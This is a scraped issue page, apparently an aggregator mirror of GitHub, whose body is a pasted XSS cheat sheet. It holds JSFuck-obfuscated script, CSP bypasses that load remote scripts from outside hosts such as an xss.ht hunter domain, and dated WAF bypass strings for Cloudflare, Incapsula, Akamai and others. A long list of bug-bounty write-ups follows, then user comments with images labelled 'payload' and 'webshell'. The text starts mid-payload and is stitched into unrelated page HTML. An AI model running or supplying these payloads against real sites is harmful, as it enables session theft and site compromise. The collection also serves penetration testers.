+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script> Bypass using jsfuck Bypass using jsfuck [][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])() CSP Bypass Check the CSP on https://csp-evaluator.withgoogle.com and the post : How to use Google’s CSP Evaluator to bypass CSP Bypass CSP using JSONP from Google (Trick by @apfeifer27) //google.com/complete/search?client=chrome&jsonp=alert(1); <script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>" More JSONP endpoints available in /Intruders/jsonp_endpoint.txt Bypass CSP by lab.wallarm.com Works for CSP like Content-Security-Policy: default-src 'self' 'unsafe-inline';, POC here script=document.createElement('script'); script.src='//bo0om.ru/csp.js'; window.frames[0].document.head.appendChild(script); Bypass CSP by Rhynorater // CSP Bypass with Inline and Eval d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://[YOUR_XSSHUNTER_USERNAME].xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000) Bypass CSP by @akita_zen Works for CSP like script-src self <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object> Bypass CSP by @404death Works for CSP like script-src 'self' data: <script ?/src="data:+,\u0061lert%281%29">/</script> Common WAF Bypass Cloudflare XSS Bypasses by @Bohdan Korzhynskyi 21st April 2020 <svg/OnLoad="`${prompt``}`"> 22nd August 2019 <svg/onload=%26nbsp;alert`bohdan`+ 5th June 2019 1'"><img/src/onerror=.1|alert``> 3rd June 2019 <svg onload=prompt%26%230000000040document.domain)> <svg onload=prompt%26%23x000000028;document.domain)> xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'> Cloudflare XSS Bypass - 22nd March 2019 (by @RakeshMane10) <svg/onload=&#97&#108&#101&#114&#00116&#40&#41&#x2f&#x2f Cloudflare XSS Bypass - 27th February 2018 <a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(document.domain)&rpar;">X</a> Chrome Auditor - 9th August 2018 </script><svg><script>alert(1)-%26apos%3B Live example by @brutelogic - https://brutelogic.com.br/xss.php Incapsula WAF Bypass by @Alra3ees- 8th March 2018 anythinglr00</script><script>alert(document.domain)</script>uxldz anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz Incapsula WAF Bypass by @c0d3G33k - 11th September 2018 <object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object> Incapsula WAF Bypass by @daveysec - 11th May 2019 <svg onload\r\n=$.globalEval("al"+"ert()");> Akamai WAF Bypass by @zseano - 18th June 2018 ?"></script><base%20c%3D=href%3Dhttps:\mysite> Akamai WAF Bypass by @s0md3v - 28th October 2018 <dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x> WordFence WAF Bypass by @brutelogic - 12th September 2018 <a href=javas&#99;ript:alert(1)> Fortiweb WAF Bypass by @rezaduty - 9th July 2019 \u003e\u003c\u0068\u0031 onclick=alert('1')\u003e References Unleashing-an-Ultimate-XSS-Polyglot tbm (Relative Path Overwrite) RPO XSS - Infinite Security RPO TheSpanner RPO Gadget - innerthmtl Relative Path Overwrite - Detectify XSS ghettoBypass - d3adend XSS without HTML: Client-Side Template Injection with AngularJS XSSING WEB PART - 2 - Rakesh Mane Making an XSS triggered by CSP bypass on Twitter. @tbmnull Ways to alert(document.domain) - @tomnomnom D1T1 - Michele Spagnuolo and Lukas Wilschelbaum - So We Broke All CSPs Sleeping stored Google XSS Awakens a $5000 Bounty by Patrik Fehrenbach RPO that lead to information leakage in Google by filedescriptor God-like XSS, Log-in, Log-out, Log-in in Uber by Jack Whitton Three Stored XSS in Facebook by Nirgoldshlager Using a Braun Shaver to Bypass XSS Audit and WAF by Frans Rosen An XSS on Facebook via PNGs & Wonky Content Types by Jack Whitton Stored XSS in *.ebay.com by Jack Whitton Complicated, Best Report of Google XSS by Ramzes Tricky Html Injection and Possible XSS in sms-be-vip.twitter.com by secgeek Command Injection in Google Console by Venkat S Facebook's Moves - OAuth XSS by PAULOS YIBELO Stored XSS in Google Docs (Bug Bounty) by Harry M Gertos Stored XSS on developer.uber.com via admin account compromise in Uber by James Kettle (albinowax) Yahoo Mail stored XSS by Klikki Oy Abusing XSS Filter: One ^ leads to XSS(CVE-2016-3212) by Masato Kinugawa Youtube XSS by fransrosen Best Google XSS again - by Krzysztof Kotowicz IE & Edge URL parsing Problem - by detectify Google XSS subdomain Clickjacking Microsoft XSS and Twitter XSS Google Japan Book XSS Flash XSS mega nz - by frans Flash XSS in multiple libraries - by Olivier Beg xss in google IE, Host Header Reflection Years ago Google xss xss in google by IE weird behavior xss in Yahoo Fantasy Sport xss in Yahoo Mail Again, worth $10000 by Klikki Oy Sleeping XSS in Google by securityguard Decoding a .htpasswd to earn a payload of money by securityguard Google Account Takeover AirBnb Bug Bounty: Turning Self-XSS into Good-XSS #2 by geekboy Uber Self XSS to Global XSS How I found a $5,000 Google Maps XSS (by fiddling with Protobuf) by Marin MoulinierFollow Airbnb – When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities by Brett XSSI, Client Side Brute Force postMessage XSS on a million sites - December 15, 2016 - Mathias Karlsson postMessage XSS Bypass XSS in Uber via Cookie by zhchbin Stealing contact form data on www.hackerone.com using Marketo Forms XSS with postMessage frame-jumping and jQuery-JSONP by frans XSS due to improper regex in third party js Uber 7k XSS XSS in TinyMCE 2.4.0 by Jelmer de Hen Pass uncoded URL in IE11 to cause XSS Twitter XSS by stopping redirection and javascript scheme by Sergey Bobrov Auth DOM Uber XSS Managed Apps and Music: two Google reflected XSSes App Maker and Colaboratory: two Google stored XSSes XSS in www.yahoo.com Stored XSS, and SSRF in Google using the Dataset Publishing Language Stored XSS on Snapchat XSS cheat sheet - PortSwigger mXSS Attacks: Attacking well-secured Web-Applications by using innerHTML Mutations - Mario Heiderich, Jörg Schwenk, Tilman Frosch, Jonas Magazinius, Edward Z. Yang Self Closing Script Bypass < with ＜ © 2021 GitHub, Inc. Terms Privacy Security Status Docs Contact GitHub Pricing API Training Blog About </div> </div> <div class="comment"> <div class="user"> <a rel="noreferrer nofollow" target="_blank" href="https://github.com/lab-sandbox"><img src="https://avatars.githubusercontent.com/u/48419710?v=4" />lab-sandbox</a> commented <strong> 3 years ago</strong> </div> <div class="markdown-body"> <p><img src="https://user-images.githubusercontent.com/48419710/110720499-abcc1900-81dc-11eb-8cf3-816cbe3cc11a.jpeg" alt="payload (copy 1)" /></p> </div> </div> <div class="comment"> <div class="user"> <a rel="noreferrer nofollow" target="_blank" href="https://github.com/lab-sandbox"><img src="https://avatars.githubusercontent.com/u/48419710?v=4" />lab-sandbox</a> commented <strong> 3 years ago</strong> </div> <div class="markdown-body"> <p><img src="https://user-images.githubusercontent.com/48419710/110720533-b8e90800-81dc-11eb-87ab-c542e7058113.jpeg" alt="webshell" /></p> </div> </div> <div class="comment"> <div class="user"> <a rel="noreferrer nofollow" target="_blank" href="https://github.com/lab-sandbox"><img src="https://avatars.githubusercontent.com/u/48419710?v=4" />lab-sandbox</a> commented <strong> 3 years ago</strong> </div> <div class="markdown-body"> <p><img src="https://user-images.githubusercontent.com/48419710/110720549-c8685100-81dc-11eb-8a6c-28a3c31610a2.png" alt="info php" /></p> </div> </div> <div class="page-bar-simple"> </div> <div class="footer"> <ul class="body"> <li>© <script> document.write(new Date().getFullYear()) </script> Githubissues.</li> <li>Githubissues is a development platform for aggregating issues.</li> </ul> </div> <script src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js"></script> <script src="/githubissues/assets/js.js"></script> <script src="/githubissues/assets/markdown.js"></script> <script src="https://cdn.jsdelivr.net/gh/highlightjs/cdn-release@11.4.0/build/highlight.min.js"></script> <script src="https://cdn.jsdelivr.net/gh/highlightjs/cdn-release@11.4.0/build/languages/go.min.js"></script> <script> hljs.highlightAll(); </script> </body> </html>